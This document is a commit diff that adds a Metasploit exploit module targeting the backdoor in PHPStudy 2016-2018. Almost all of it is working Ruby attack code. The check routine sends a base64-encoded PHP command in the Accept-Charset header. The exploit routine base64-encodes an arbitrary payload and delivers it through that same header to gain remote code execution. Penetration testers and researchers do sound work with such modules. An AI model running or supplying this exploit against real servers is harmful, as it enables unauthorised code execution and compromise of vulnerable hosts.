Add phpstudy backdoor exploit module

modules/exploits/multi/http/phpstudy_backdoor_rce.rb

@@ -0,0 +1,67 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Phpstudy Backdoor Remote Code execution",
+      'Description'    => %q{
+        This module can detect and exploit the backdoor of PHPStudy.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Airevan' ],
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['PHPStudy 2016-2018', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 20 2019",
+      'DefaultTarget'  => 0
+    ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path', '/'])
+        ])
+  end
+
+
+  def check
+    uri = target_uri.path
+    res = send_request_cgi({
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(uri),
+      'headers' =>  {
+        'Accept-Encoding' =>  'gzip,deflate',
+        'Accept-Charset'  =>  'ZWNobyAndnVsbmVyYWJsZSc7Cg=='
+      }
+    })
+
+    if res && res.code == 200 && res.body == 'vulnerable'
+      #print_good(res.body)
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+  end
+
+  def exploit 
+    uri = target_uri.path
+    payload_encoded = Rex::Text.rand_text_alpha(0)
+    payload_encoded << payload.encoded
+    shellcode = Rex::Text.encode_base64(payload_encoded)
+    print_good("Sending shellcode")
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(uri),
+      'headers' => {
+          'Accept-Encoding' => 'gzip,deflate',
+          'Accept-Charset'  => shellcode
+      }
+    }) 
+  end
+end